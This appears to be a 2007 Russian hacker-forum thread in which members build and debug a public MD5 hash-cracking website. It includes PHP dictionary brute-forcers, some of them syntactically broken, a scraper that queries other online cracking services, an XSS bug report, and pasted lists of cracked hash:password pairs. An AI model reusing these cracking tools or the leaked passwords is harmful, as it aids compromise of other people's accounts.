2. Вы можете помочь, проекту и другим - запятая не нужна.
3. Страницу оптимизировать под поисковики не будем? Чтобы она стала популярной среди хакеров других сайтов.
1,2 исправил, шас halkfild зальёт скрипты на http://md5.xek.cc
3. Обкатаем немного и займёмся этим делом...
ЛифчиС5СВ
10.12.2007, 15:37
Кинул в личку halkfild подходящие метатеги, он глянет уже...
halkfild
10.12.2007, 23:48
появилась свободная минутка, обновил скрипты и дизайн
http://md5.xek.cc
там же есть и не расшифрованные хеши, так что можете брутить ;)
В нашей базе 112172 хешей
з.ы. завтра, наверное, добавлю большой словарик предоставленый x_Lex из своих бурутов))
з.з.ы. скрипты много переписал
-=lebed=-
11.12.2007, 00:33
Я тоже завтра займусь пополнением базы.
Вопрос к администрации, сколько хэшей должно быть в базе, каков должен быть двиг, насколько должен быть раскручен сервис, чтоб можно было сделать этот сервис официальным, например md5crack.antichat.ru (с выделением субдомена и размещением скриптов и бызы на хосте). И вообще есть ли шансы у него стать таковым?
P.S. По результатам голосования (https://forum.antichat.ru/thread54603.html) видно, что участники в большинстве "ЗА" такой сервис. Кроме того он уже может частично заменить тред "Расшифровка хэшей md5" Если одни участники будут класть хэши в базу, другие брать от туда их и подбирать пароли, затем добавлять пароли в базу.
2 halkfild при переходе
http://md5.xek.cc
тут ошипка =) (ц) blackybr
ппц... =))))
-=lebed=-
11.12.2007, 00:44
ещё глюк:
не найдено соответствие данному хэшу в нашей базе
пароль mustdie найден на passcracking.ru и добавлен в нашу базу
хэш добавлен в очередь на расшифровку.
У меня (на http://antichat-md5-crack.bolnoy.com) такого глюка нет:
Пароль не найден в нашей базе, пароль mustdie добавлен в нашу базу
(хотя был когда тестил на локалхосте, потом исправил)...
ЗЫ Я же дал уже правленные (там всё пашет без явных глюков...)
halkfild с обновлением скриптов наверное перестарался..
А еще у меня такой вопрос, если повторно ещешь хэш, а его как не было так и нет, он повторно добавляется в очередь на расшифровку или дубликаты исключены ?
-=lebed=-
11.12.2007, 00:58
Кстате хэш, пароль которого найден на passcracking.ru действительно добавляется в базу и помечается как не расшифрованный.
Ну а дальше глюки будут только накапливаться:
пароль найден: 89058651980
хэш добавлен в очередь на расшифровку.
НИЗАЧОТ!, halkfild ;)
PS У меня тоже некоторые глюки обнаружились: пасс найденный на passcracking.ru пишет, что добавлен в базу, а после добавления снова ищется на passcracking.ru, а в базе не находится...
halkfild
11.12.2007, 01:06
там трабла со вторым поисковым сервисом.. я исправляю..
подождите пару минут
*все все исправлено.. :rolleyes: :rolleyes:
новый сервис с нами plain-text.info
по предложению лимпа)
-=lebed=-
11.12.2007, 01:14
там трабла со вторым поисковым сервисом.. я исправляю..
подождите пару минут
ОМГ, ты уже второй прикрутил, какой? Угу, правь, потом базу придётся чистить от повторяющихся хэшей, кстате, имхо, надо добавить признак уникальности на поле хэш, чтоб не допустить повторов средствами самого мускула (или это уже сделано?).
-=lebed=-
11.12.2007, 01:23
Убери ещё перенос строки <br> после:
....отсутствуют хэши простых паролей, <br>
Ещё глюк: ввёл хэш на расшифровку-> нигде не найден -> добавлен в очередь на расшифровку,
далее добавляю пароль (от этого хэша) -> пасс добавлен в базу. Далее снова ищем этот хэш и находим... "-----------------" т.е. в очереди на расшифровку. При добавлении пасса надо искать именно хэш от него, а не пасс по таблице, тогда уйдём от этого и если хэш найден, то писать в таблицу пасс именно в ту запись, где его хэш. (или ту удалять, а новую заносить пасс с хэшем). вот...
halkfild
11.12.2007, 01:28
такс.. вроде все ок
теперь парсим еще и plain-text.info
з.ы. о багах пишите сюда или в пм
завтра снесу все повторяющиеся
-=lebed=-
11.12.2007, 01:40
Исправим баги, надо будет сделать стату, да и счётчик поставить не мешало-бы...
limpompo
11.12.2007, 02:02
пароль не найден на plain-text.info
Хотя он тама есть!
-=lebed=-
11.12.2007, 10:51
1226: User 'bl4cky_md5' has exceeded the 'max_questions' resource (current value: 15000)
max колличество запросов 15000, после этого база не доступна, с этим можно что-нибудь сделать? (трабла при добавлении списка пассов). Поставьте плиз 100000 хотя-бы.
исправь строку
(с) halkfild, -=lebed=- Antichat.ru
там стоит: <a href="antichat.ru">Antichat.ru</a>
а нада: <a href="http://antichat.ru">Antichat.ru</a>
halkfild
11.12.2007, 14:03
добавил автоудаления с списка хешей для брута..
и plain-text.info нормально находит.. /*были траблы с куками*/
вообщем пишите баги и предложения
http://md5.xek.cc/
-=lebed=-
11.12.2007, 15:39
Добавил уникальные пароли из PasswordPro.dic от FHT (обновил 1 пост темы.)
P.S. В нашей базе 145140 хешей.
To halkfild поставь вывод пароля через htmlspecialchars($pass), а то XSS осталась hash:1cd4d78142e0398528f94d8d6183740e
-=lebed=-
12.12.2007, 02:07
Ещё надо исправить, если ищем хэш, то надо его всё равно искать сначала на внешних сервисах, а потом в нашей базе, и если пасс сложный, то добавлять в нашу базу, если простой, то нет. Так как хэши от простых пассов попавшие в очередь на расшифровку никогда не исчезнут из того списка, так как нельзя добавить простой пароль.
Пример хэш:пасс c5e3d7214e2cad295a09ff2b3c4a75dc:4613063
Кстате замечено что хэшей от простых паролей так же нет в популярных онлайн-базах...
Три варианта решения проблемы:
1. Скрипт бруттер простых пассов (- скорость работы, нагрузка на сервер)
2. Понизить ограничения на простые пароли.
3. Сильно расширить базу онлайн сервисов по которым осуществляется поиск (по типу md5search.uk.to)
4. Организовать запрос на md5search.uk.to. (есть там фича, можно минуя капчу) там уж точно по 36 сервисам найдуться простые пассы.
3. Запихивать в базу и простые пароли. (что не желательно).
Red_Red1
12.12.2007, 13:28
Потестил.
1. Есть ХСС, но тут я не первый, первым был Spyder с хешем 1cd4d78142e0398528f94d8d6183740e.
Причем для реализации не нужно кодировать урл и т.д., просто просим кого-то проверить нужный хеш ссылаясь на то что „у меня сервис что то не открывается”. Но так как авторизации нету, то и куки нам нафиг не нужны, а значит ХСС тоже :).
Но недостаток для пользователя все же есть. Дело в том что если пароль будет вида <password> или <b>password, то в первом случае юзер вообще не увидит результатов, хотя будет надпись «пароль найден», а во втором засветится «пароль найден: password» но уже без <b>. Т.е. если кусок пароля будет содержать открытую и закрытую скобки, то при построении страницы они не будут выведены (хотя в ресурсах страницы мы можем найти результат)
2. Дальше интереснее. Баловался с кавычками. Если пароль будет содержать кавычку (например p”assword, его хеш b2bb20ac9190447c8b0ba957d0c96f3d) и мы его добавим в базу, то при попытке поиска по хешу мы НЕ найдем пароль (есть одно но… если этот хеш будет в базе на других сервисах с которыми дружит данный то все таки найдет). Не найдем потому что в базу пароль попадает в виде p\”assword и соответственно его хеш равен bf9c508e10fa5a958e6d7b57402d2a39. Та же ситуация со слешами, ведь они тоже экранируються. Т.е. если мы добавляем пароль такого вида \\\\\\ то экранирование его преобразует в что-то со множеством слешей :) и в базу попадает савсем другой пароль и хеш. С одинарной кавычкой тоже самое.
3. После предыдущего под прицел попали такие сочетания символов: " & и т.д. т.е. заменители служебных символов (как они там правильно называются?). Если пароль будет иметь эти сочетания то при выводе они будут отображаться как те символы которые они представляют. Т.е. если пароль будет вида p"ass (его хеш - afe5d4a6a9b8bc7e8a86385d5ee720b2) то при выводе результатов поиска мы увидим p”ass, что, согласитесь, нам не подходит.
4. Интересное явление наблюдается при «парсинге» с других сервисов паролей содержащих кавычки. Дело в том что если такой пароль будет найден на дружественном сервисе, то он верно отобразиться при поиске, НО в базу будет занесено совсем другое. Например: p””assword (c3cb8f719fee2067b2ab98065f34fa16) если будет находиться в базе пасскракинг.ру то при поиске мы увидим что „пароль найден не у нас и добавлен в базу”, при этом вывод этого пароля будет верный, а вот в базу попадет то что спарсили, а именно p""assword. От этого пароля будет найден хеш и тоже будет занесен в базу. Если мы еще раз попытаемся поискать хеш от p””assword, то сервис его у себя не найдет, а найдет у чужих и ЕЩЕ раз занесет в базу и т.д. Это способ добавления ОДИНАКОВЫХ записей в базу, при этом они НЕ НУЖНЫ там.
Этот случай я до конца не исследовал, там в комбинации с предыдущими возможны разные варианты….. и реакция системы тоже разная :).
5. База позиционируется как база уникальных паролей. В ней нету коротких, 1-8 цифровых и т.д. Но если поискать хеш от этих паролей то его найдут сторонние сервисы и услужливо внесут этот пароль в базу. Во всяком случае об этом пишет сервис «пароль был добавлен…», когда я консультировался с Халкфилдом, он ответил что такие пароли вырезает. (я проверял не всегда вырезает) Вроде бы проблема решена, но если вырезает то возникает следующая ситуация. Например мы ищем хеш от пароля %:?, (он не попадает в категорию для занесения в базу) при этом его нету у дружественных сервисов, то нам пишет ответ «не найден», а сам хеш добавляется в очередь для поиска. Как только пароль будет найден, он НЕ БУДЕТ записан в базу (вот этого проверить не удалось… т.к. не знаю как работает скрипт), юзер который запросил поиск этого пароля, снова запросит и снова получит ответ «не найден, добавлен в очередь» и так пока не надоест. Хотя пароль находиться. Это недостаток НЕхранения найденных коротких паролей, они не будут найдены никогда.
Было что то еще, но пока писал – забыл :)
Комбинации всего этого получаются интересными…..<”\\"password’> или “””
Вывод такой….. в базе должны храниться пароли в своем первоначальном виде, без всяких заменителей и экранов. Служебные символы и сочетания должны обрабатываться правильно, тоже при парсинге от других сервисов. Нужна проверка на повторяющиеся записи в базе. Та возможность добавления простых пассов (или все же не добавляет) от дружественных сервисов, а также внесение из-за экранирования кавычек и слешей, да и все остальное…. делает запись о количестве хранимых в базе хешей очень не правдивой с точки зрения УНИКАЛЬНОСТИ базы, т.е. базы хранящей только уникальные пароли найденные юзерами. Ведь на самом деле там меньше таких паролей, остальные либо короткие или цифровые добавленные других серверов, либо пароли которые имеют заэкранированые служебные символы типа кавычек. Может их и не так много но все же.
З.Ы. Если все это не актуально не судите строго просто потрите пост или я сам удалю если будет нужно.
З.Ы.Ы. Еще бы хотелось увидеть исходники скриптов…… была мысль о возможности выполнения «злого» ПХП кода при поиске определенных хешей….Халкфилд обещал дать посмотреть…. ;)
Опять дофига написал..... ну не могу иначе :(
Предложение-добавить ссылку на http://web18.server10.nl.kolido.net/md5cracker/crack.php (прогоняет по 13 крекерам+возможность грузит листы с хешами весом до 100кб) ,в строку "или другие онлайн-сервисы."
censored!
12.12.2007, 20:53
Возможно уже писали:
Заходим:
http://md5.xek.cc/noncrack.php
Берем третий (сейчас он третий):
02afd084bc84532f487b5b45179bb189
Возвращаемся на:
http://md5.xek.cc
Вставляем:
02afd084bc84532f487b5b45179bb189
пароль найден: mustdie
Так чего он висит на нерасшифрованных?
Или они там раз в * минут/часов/дней прочекиваются по базе и уже ранее найденые удаляются?
halkfild
12.12.2007, 21:17
это во время тестирования добавлялись вроде..
з.ы. я потер все хешт к перебору в виду того что там было много ненужных никому.. /*те которые добавил ред при тестировании*/
вообщем добавляйте нужные заново =\
2 censored! там есть проверка если пасс находится, то в очередь для расшифровок он не заносится
2 v1ru$ интересный сервис жаль что жабаскрипт =\ а вообще можна попробовать парсить все это дело
Если есть возможность, скиньте плз вашу базу с паролями мне в пм, ибо иногда приходится брутить не только мд5, а ещё и другие хэши + соль =\
[Paran0ik]
14.12.2007, 05:00
я бы тоже не отказался от этого словарика :)
otmorozok428
14.12.2007, 11:38
2. В нашей базе содержатся уникальные пароли, отсутствуют хэши простых паролей,а именно:
а) состоящие только из цифр (1-8 символов);
б) состоящие только из маленьких латинских букв (1-6 символов);
в) состоящие только из заглавных латинских букв (1-6 символов);
г) из любых символов длинной менее и равной 4 символам.
и вот после добавления хешика пишет:
не найдено соответствие данному хэшу в нашей базе
пароль 223702 найден на passcracking.ru и добавлен в нашу базу
и ведь не наврал :) при повторном запуске пишет
пароль найден: 223702
Чтобы соответствовать пункту 2 - нужно убрать добавление простых паролей полученных со сторонних сайтов...
Iceangel_
14.12.2007, 19:38
Внес посильный вклад в наш проект... =)
уникальных паролей добавлено в базу: 102 неуникальных паролей: 673 спасибо
+расшифровал 3 пасса из нерасшифрованных...
уникальных паролей добавлено в базу: 22 неуникальных паролей: 844 спасибо.
Ворненг ! я дырку нашел,суть в том что при выводе пароля из базы,он выводиться напрямую html а надо обычным текстом :) пример: http://i011.radikal.ru/0712/04/8e94bc193f06.jpg. Greetz to xekera,kaspersky lab :D
Virus подал отличную идею насчет http://web18.server10.nl.kolido.net/md5cracker/crack.php. там есть 13 крякеров. было бы неплохо добавить ещё и те, о которых писалось на antichat-е. их будет значительно больше. большой плюс проекта античат мд5 кряк- это то, что он не использует javascript :)
добавьте больше крякеров !!!!!! и web18.server10.nl.kolido.net отсосёт. а на данный момент он лучший ( доказано ниже )
взял все пассы из листа расшифровки и кинул текстовик с ними на web18.server10.nl.kolido.net..
результат:
a5fbd6b8e1451b99f5e3749411078b68 nicht gefunden
688d8a12df090cf0941e2c2755eb7e3a nicht gefunden
2b692f9b73219bb92d294a3a8ffd4a1a nicht gefunden
47f037a550071f8fb765911ad657804f nicht gefunden
2a9655bd9f1147c0cf9812b1217954a4 nicht gefunden
220042355baf769e568a394180cc7e13 nicht gefunden
e42775499d8cfe354c26f39f41027e5b nicht gefunden
754d4927ed3ade6f6cb14af6044bd017 - 'ppict'
ebc25f247ec118591d8e17113e7662a0 nicht gefunden
dc2947a2805c09ac3cec64402b4caa22 nicht gefunden
382e0360e4eb7b70034bbaa69bec5786 nicht gefunden
a6d56b08a5d148361f7ffcd998831e80 nicht gefunden
7e4e211748bb3309896d6367945f493f nicht gefunden
4409e449fff5451bc655dee1ad9f8637 nicht gefunden
7e0fcb526b833225743e7b8f53f99742 nicht gefunden
d52817c20b7e15d35f2e2d5fca6cbaee nicht gefunden
53f55b7cd99117e55f258fafb200726a nicht gefunden
e96fc498f86fade46aeb8467b8c3b7cb nicht gefunden
754d4927ed3ade6f6cb14af6044bd017 был перепроверен на вашем крякере. без результатов. ДОБАВЬТЕ КРЯКЕРОВ !!!!
добавить я пасс "ppict" не смог.,
пароль слишком простой, извините не добавлен в нашу базу
5cb3fde94b0e57b31d6e4f69f9e7f1bb - '4551208' - toje prostoi....
24406b36b0176d3ae001ce67ecc7f9ef - '7085603'
-=lebed=-
14.12.2007, 22:30
Я уже говорил halkfild`у что вывод пасса нужно сделать через htmlspecialchars($pass).
У меня нет доступа на новом хосте, так что я править скрипты я не могу, ждёмс halkfild`a...
Имхо логично будет всё-таки не добавлять простые пассы, а использовать бруттер в этом случае (может ослабить критерий простых пассов, чтоб обеспечить быстрое время брутта простых паролей.)
ЗЫ Да, в списке не расшифрованных пассов накапливаются либо хэши от простых паролей либо от сложных ;-)
до меня 147328 хешей
после меня 149320 хешей
пару раз висла страница
уникальных паролей добавлено в базу: 103 неуникальных паролей: 714 спасибо.
уникальных паролей добавлено в базу: 740 неуникальных паролей: 146 спасибо.
Я в php не сильно шарю но хочу спросить как идёт подсчёт хешей?
halkfild
14.12.2007, 23:01
исправил вывод
есть реализованый запрос к базе пассвордпро потестю и залью
а вообще думаю как ускорить парсинг множества разных серверов /*так сильно медленно*/ на выходных может придумаю тогда сделаю еще дополнительные сервера для парсинга
з.ы. сессия =\ и конец семестра =\\
на больший файлах страница вылетает типа время отклика истекло, не удобно так заливать сделайте типа выбрать файл и залить а он там сам проверит и поставит что надо.
-=lebed=-
14.12.2007, 23:12
на больший файлах страница вылетает типа время отклика истекло, не удобно так заливать сделайте типа выбрать файл и залить а он там сам проверит и поставит что надо.
по 1000 шт. пока добавляй, а добавлять из файла если дать такую возможность всем, то можно быстро засрать базу, никому не нужными левыми, не использующимеся реально пассами...
-=lebed=-
14.12.2007, 23:15
до меня 147328 хешей
после меня 149320 хешей
пару раз висла страница
уникальных паролей добавлено в базу: 103 неуникальных паролей: 714 спасибо.
уникальных паролей добавлено в базу: 740 неуникальных паролей: 146 спасибо.
Я в php не сильно шарю но хочу спросить как идёт подсчёт хешей?
неуникальные пассы, это те которые уже есть в базе + простые пассы, удовлетворяющие условиям (по крайней мере так должно быть) т.е. не уникальные это те, которые не добавлены...
неуникальные пассы, это те которые уже есть в базе + простые пассы, удовлетворяющие условиям (по крайней мере так должно быть) т.е. не уникальные это те, которые не добавлены...
Смысл этих строк понятен.
-=lebed=-
16.12.2007, 13:17
Вот md5 бруттер на php c диска ][, имхо есть смысл простые пассы положить в файлы словарей, а для совсем простых сделать секцию перебора грубой силы. Также натравливать этот бруттер на хэши которые в очереди. Вообщем взять код за основу и модернизировать под наш сервис...
<?
ignore_user_abort(1);
set_time_limit(0);
$fd = fopen("./dict.txt", "r");
$fl = fopen("./log.txt", "a");
$fs = fopen("./hashs.txt", "r");
fls = fopen("./stat.txt", "w");
$count = 0;
if(!$fd){
return "Fill 'dictionary_file' field!";
}elseif(!$fl){
return "Fill 'log_file' field!";
}elseif(!$fs){
return "Fill 'hashs_file' field!";
}else{
while(!$feof($fd)){
$pass = fgets($fd);
$brute_hash = md5($pass);
while(!$feof($fs)){
$hash = fgets($fs);
if($brute_hash == $hash){
fputs($fl, "$hash:$pass\n---\n");
}
}
$count = $count + 1;
fputs($fls, "$count passwords was bruted...");
}
}
fclose($fd);
fclose($fl);
fclose($fs);
fclose($fls);
?>
Некоторые простые пассы, хэши которых висели в списке на очередь:
:754d4927ed3ade6f6cb14af6044bd017::ppict:
:5cb3fde94b0e57b31d6e4f69f9e7f1bb::4551208:
:fab8f78b3cd43049138aa5b454eddaa2::1132784643:
:5b30a0f7deaaa4c614c1afb4d0ad0898::1227859399:
:2a083e28035c13beb76954a7a73f18e5::1728023422:
:24406b36b0176d3ae001ce67ecc7f9ef::7085603:
:e6e2e228c163a654421f07aaed2a978c::asd#:
:92787828dd5d5f1d87224553c0b75600::moelee:
:812bb4fa138ce5f1fd04a5cf64a7a80f::godan2:
:5f319e10009df78ec19100e15b5b9528::kolin5:
:27bcc71b3fb9af54bd7a33b4af585000::parcluna:
:e3b064be59ee0641fba1368debc87a0c::0123787834:
:9c57813f3cbf3a2aab31c9eaea9e49b3::obeedog:
:9c353c216170140820a1692a6c278b48::nckitty:
:057fa42e2fc916b4db53ee924349781d::pooh2j:
:004131f524d2c02ce87fa694689d6a35::millaj:
:adcda3d71dc1142c6b41f079456cc149::ivrian:
:ba53f8b035ae68ae7ce233db0747172c::bbh931:
:c132732e2a8eaf516865d3472a44fb11::beto76:
:73182c5fa1247691dc523b9eb4ed303e::pusniala:
:1eccbaad2ce1a22a8f7930ee753a9cad::baracsi:
:aabc207dce1c39f566cdb55054a577ae::kirilp:
:d5de533b8a8dc53d5a8a67c7592cf9bd::24051955:
:dbbd1a1f6eb7580d147c9f8d8a8262af::38281212:
:d5893682a6007733cf5248b6333acc8d::seaaes:
:416212b3f91847074904fec4ae28e9c8::74102290:
:0f1e04feb5db3b999d506fc2cb66e6a5::mmamai:
:37d08eceae69fb902e2c5a8efd8148c5::5533533:
:e8bab9c89cd37f8722dcab5560cff8d5::cocucyka:
:b50253cd29a1a26e8a5848f06419cee3::6447375:
:6265cb787bec666a7b8c9ab8744c4c2f::43420785:
:faf660e91a333caa06756d1d6878d14f::adminalex:
:c0788825fd3d5b2d4c2084bad8dbf7e8::4mga23:
:1157aeed1d047382d4c76df0dc77fdf4::cocat:
:e26b1f44a30f60f7ff6b009e96d0f936::314408825:
Серенький
16.12.2007, 19:46
На index.php и на wlist.php в надписи "В нашей базе ****** хэшей" указывается разное количество оных. имхо есть смысл простые пассы положить в файлы словарейсогласен, иначе как узнаешь, что пароли в очереди непростые.
-=lebed=-
16.12.2007, 23:59
Вот скрипт NOmer1 парсит хэши по 5 - ти сервисам, их тоже можно добавить в наш сервис.
<?php
set_time_limit (0);
error_reporting(0);
function read()
{
if(!isset($GLOBALS['StdinPointer']))
{
$GLOBALS['StdinPointer'] = fopen("php://stdin","a");
}
$line = fgets($GLOBALS['StdinPointer'],255);
return trim($line);
}
function unmd5($hash)
{
function file_post_contents($url,$query)
{
$url = parse_url($url);
$fp = fsockopen($url['host'], 80, $errno, $errstr, 30);
if(!$fp)
{
return false;
}
else
{
$postContents = "POST ".$url['scheme']."://".$url['host'].$url['path']."?".$url['query']." HTTP/1.0\r\n".
"Host: ".$url['host']."\r\n".
"Referer: ".$url['scheme']."://".$url['host'].$url['path']."?".$url['query']."\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".strlen($query)."\r\n\r\n".
$query;
fputs($fp, $postContents);
$result = '';
while(!feof($fp))
{
$result .= fgets($fp, 128);
}
fclose($fp);
return $result;
}
}
$one = file_post_contents('http://milw0rm.com/md5/search.php', 'hash='.$hash);
preg_match('|<TD align="middle" nowrap="nowrap" width=90>([^(md5)]+)</TD>|', $one, $a);
if($a[1] == false)
{
$two = file_get_contents('http://us.md5.crysm.net/find?md5='.$hash);
preg_match('|<li>(.+)</li>|U', $two, $a);
if($a[1] == false)
{
$three = file_post_contents('http://md5crack.it-helpnet.de/index.php?op=search', 'md5='.$hash);
preg_match('|<td>'.$hash.'</td><td>(.+)</td>|', $three, $a);
if($a[1] == false)
{
$four = file_get_contents('http://md5.benramsey.com/md5.php?hash='.$hash);
preg_match('|<string><!\[CDATA\[(.+)\]\]></string>|U', $four, $a);
if($a[1] == false)
{
$five = file_post_contents('http://www.md5decrypter.com/', 'hash='.$hash);
preg_match('|Normal Text: </b>(.+)|', $five, $a);
}
}
}
}
return $a[1];
}
echo("Enter md5 hash:\n\n");
$hash = read();
if(preg_match('|^[a-f0-9]{32}$|',$hash))
{
$password = unmd5($hash);
if($password)
{
echo "Password: ".$password."\n\n";
}
else
{
echo "Password not found\n\n";
}
}
else
{
echo("it's not a md5 hash!\n\n");
}
echo("Press 'Enter' to exit");
read();
?>
halkfild
17.12.2007, 00:01
ок добавлю
з.ы. тестил снег но говорят что он медленный и подвисает в некоторых =\
взял хэши из выложенных там -
нашел пару паролей
отослал
проверяю хэш - говорит пароль не найден а хэш найдет в очереди на брут
и ошибка в предложении (пароль не найден, хэш найден в базе, в очереди на на расшифровку
)
-=lebed=-
17.12.2007, 00:25
что делать с простыми пассами?
1. Генерировать их на лету скриптом?
2. Сунуть их в один словарь? 2,38+2,38+1,023+0,435=6,218 Гб. - (потребуется столько места для словаря) оно есть на хосте?
3. Или добавив других сервисов проблема с простыми паролями отпадёт сама собой? (станет выше вероятность что простой пароль хоть где-нибудь да найдётся).
ЗЫ так как до сих пор хэши от простых пассов попадают в очередь на расшифровку...
halkfild
17.12.2007, 00:30
я думаю что если пас находим в очереди то добавляем в базу
забивать простыми не будем.. но тех что нет будем хранить
Dda
добавь пасс в базу и попробуй снова
*/*добавлю что бы не раздувать тему*/
фильтр я немного переделаю.. что бы если с очереди то добавлялся, а иначе - нет
-=lebed=-
17.12.2007, 00:36
я думаю что если пас находим в очереди то добавляем в базу
забивать простыми не будем.. но тех что нет будем хранить
Dda
добавь пасс в базу и попробуй снова
Дык если пасс простой от хэша, который в очереди, то его ручками не добавишь - фильтр не даёт (тогда его надо отрубить, если добавляют пасс от хэша который в очереди стоит)
добавил пароль kirkhammet от хэша 7d2a810bd0f0f068d9e3d7231b9ce1fb
а по хэшу досих пор не находит пароль по нему
-=lebed=-
17.12.2007, 00:50
добавил пароль kirkhammet от хэша 7d2a810bd0f0f068d9e3d7231b9ce1fb
а по хэшу досих пор не находит пароль по нему
Всё норм., я щас добавил, стал находить...
halkfild
17.12.2007, 00:53
7d2a810bd0f0f068d9e3d7231b9ce1fb
пароль найден: kirkhammet
-=lebed=- отредактировал пост выше
если добавляю пароль через форму где много паролей добавлять можно то пишет что пароль еже есть но хэш от него не находиться пока не добавляю пароль через форму на главной странице - то хэш уже находиться
Iceangel_
17.12.2007, 18:08
2 -=lebed=-
Вот пассы, которые я нашел из списка, который ты уже по таблам прогонял... ;-)
:ebc25f247ec118591d8e17113e7662a::cappuchino:
:02afd084bc84532f487b5b45179bb18::mustdie:
:e6e2e228c163a654421f07aaed2a978::asd#:
:9c8a3a25863ff9bbfd2defcde11516f::viviane57:
:319f59bc863a4eb002da1934901aebb::9999900000:
:cfe41132e0db8f3fd3009055ae52106::pontiac01:
:6eaf109fbe6acae4dafe65bdcf3c1d2::nikken2002:
:1feeea62fbdde3b54c268598c0747c8::12refugio:
:6b4729d3f09764253ff132c110bdd83::!adneled:
:0304c4dc3307317129f620d1eecefb7::einfach49:
:ae3a614546e2ed1231d4eec77c0a4aa::master12345:
:47aeab95375e5daf09dfb6e6b5e5dee::xetrov666:
:53408726bdb891ddfa3c6f60a8d62b2::pepperoni2:
:95dba5f442a127aeafb6a652eff576d::pirate4:
:c494faec38347fbe6e81bc62c3ff017::Akasha77:
:93852c3acee33dc3561e35f5f9dcfdf::1sunny7:
:e40cece508d4eaa64dfe29935b56705::Philem0n:
:8993ec748286c29afa8b2d11acc1c0b::hawaii68:
-=lebed=-
17.12.2007, 18:14
2 -=lebed=-
Вот пассы, которые я нашел из списка, который ты уже по таблам прогонял... ;-)
:ebc25f247ec118591d8e17113e7662a::cappuchino:
------------------
:8993ec748286c29afa8b2d11acc1c0b::hawaii68:
Добавлены...
ЗЫ To halkfild сделай добавление пассов списком, от тех хэшей которые в очереди на расшифровке, так как добавление и исключение из очереди пашет только через форму добавления одного пасса.
halkfild
17.12.2007, 22:10
такс.. скрипты подправил
простые пароли добавляются в базу, если они есть в очереди на расшифровку
/*изменения коснулись как простого добавления, так и группового)*/
з.ы. пишите о багах сюда
-=lebed=-
17.12.2007, 23:40
такс.. скрипты подправил
простые пароли добавляются в базу, если они есть в очереди на расшифровку
/*изменения коснулись как простого добавления, так и группового)*/
з.ы. пишите о багах сюда
Добавил 36 пассов от хэшей в очереди:
уникальных паролей добавлено в базу: 0
неуникальных паролей: 6
простых паролей: 31 спасибо.
Как сообщение понимать?
halkfild
17.12.2007, 23:48
понимать что этих пасов нет в очереди.. =\
попробуй сделать поиск по хешу с этих простых пассвордов..
эти пассы что ты искал есть в очереди?
з.ы. как-то тема раздулась =\
Я тут расшифровал пароли
:6fe457e064b878f169680a701317afcb:19111988
:1157aeed1d047382d4c76df0dc77fdf4:cocat
:3309d41eadd092d770eb50167f9fc5f1:dampir
:7d61a986a0a012d139c988fff4881f46:demomode
:aabc207dce1c39f566cdb55054a577ae:kirilp
:c6339947bdb7060ac6dd28bbc7293159:llotw
:754d4927ed3ade6f6cb14af6044bd017:ppict
:b99ce09a12753de203085758f7274695:tpswa
:271b03521db6780ac64d8faab467fcac:vezvu
:046531ffc2408bca4ad24ac92c9644c3:yohoho
add
:d5de533b8a8dc53d5a8a67c7592cf9bd:24051955
:5cb3fde94b0e57b31d6e4f69f9e7f1bb:4551208
:b847eaff0df2b6ddd2ddc48ee58ee15b:aq24
:e6e2e228c163a654421f07aaed2a978c:asd#
:37a4bf00ea98b4a9210f822e89fd8c67:clowdy75
:c7553eea7a0e054c6ed14336c332628f:ding1381
:1a4109d077b1cb3d09da3db88491ff11:july2275
:8dcb15208ee15e8bceec70efa334e091:link1982
:b5b5f3c89069d15ca28a64f2c8d43860:masternl
:004131f524d2c02ce87fa694689d6a35:millaj
:0f1e04feb5db3b999d506fc2cb66e6a5:mmamai
:5bca7c70697f1117ad1c90bb6c7c1020:mybros
:24178c5bb8e4b5bbb4b2ba7f125c7e58:paswrd0
:86d1d5d4589bf76c8c8e254da08e0b90:sweethope
:ddd1b09c294040ab731b4b96f4e120a9:tulip9
-=lebed=-
17.12.2007, 23:51
понимать что этих пасов нет в очереди.. =\
попробуй сделать поиск по хешу с этих простых пассвордов..
эти пассы что ты искал есть в очереди?
з.ы. как-то тема раздулась =\
Я брал хэши из очереди, прогнал в пассвордпро быстро и добавил пароли из тех что расшифровались... (ну может я не успел, кто-то ещё добавил... ;) )
Ну вот хэш 754d4927ed3ade6f6cb14af6044bd017 он есть в очереди, пасс от него простой ppict - через список недобавился...
Может есть записи с повторяющимися хэшами? А вот через форму добавления одного пасса он добавился теперь.
blackybr
18.12.2007, 00:17
до завтра добавление не будет работать - будет сделана капча. кто-то решил пофлудить, с рук ему это не сойдет :)
halkfild
18.12.2007, 00:24
завтра займусь капчей.. а сегодня наверное пичищу всю очередь
з.ы. просто пока изменяли тестили то опять много всякой хрени туда накидали =\
з.з.ы. это последний раз))
*добавдено очередь почищу утром или поздно вечером.. пока может понаходим пассы от хешей
з.ы. груповое добавление работает, но пока отключили /*по пасам гришки
уникальных паролей добавлено в базу: 10
неуникальных паролей: 5
простых паролей: 0 спасибо.
и то потому, что я ручками добавлял сначала
*/
А те пассы которые ты расшифровал, кидать сюда в топ?
halkfild
18.12.2007, 00:47
да кидайте сами пассы сюда или ссыли на файлы с бручеными пасами с очереди
38281212
43420785
4613063
479972699
5533533
6357966
6447375
7085603
74102290
79772305
seaaes
mygoldy
вот ещё выжал :D
вы уж извините, терпения нет :) буду так выкладовать
ivrian
lad108
gnirrabl
короче каждый новый код это новые хеши)
htnebw
lilyce
blutch
-=lebed=-
18.12.2007, 12:05
может добавить функцию брутта по словарю содержащему простые пароли?
function brutte($hash)
{
include('conf.php');
$fd = fopen("./dict.txt", "r");
if(!$fd)
{
return "Fill 'dictionary_file' field!";
}
else
{
while(!feof($fd))
{
$pass = fgets($fd);
$brute_hash = md5($pass);
if ($brute_hash == $hash)
{
fclose($fd);
return $pass;
}
}
fclose($fd);
return false;
}
fclose($fd);
return false;
}
или скорость работы оставляет желать лучшего, да и нагрузка дополнительная + место под словарь нужно 6-7Гб.
Зы Щас затестю у себя на локалхосте...
alkjtk
djgdog
moelee
royoyr
всё из той же базы :)
ilike1candy
target4321
lennocow
angellll
-=lebed=-
18.12.2007, 23:22
То hilkfild:
Есть предложение хранить в базе хэши не в виде строки типа char(32) а в виде char(16) используя функции кодирования хэша (перед занесением в базу) и декодирования (после извлечения из базы)
Выгоды: уменьшение базы, быстрее поиск по базе.
Вот сами функции кодирования и декодирования:
function code_hash($hash)
{
$n=0;
$hash_code="";
$l=strlen($hash)-1;
do
{
$code='0x'.$hash[$n].$hash[$n+1];
$hash_code.=chr(hexdec($code));
$n++;
}
while ($n++<$l);
return $hash_code;
}
function decode_hash($string)
{
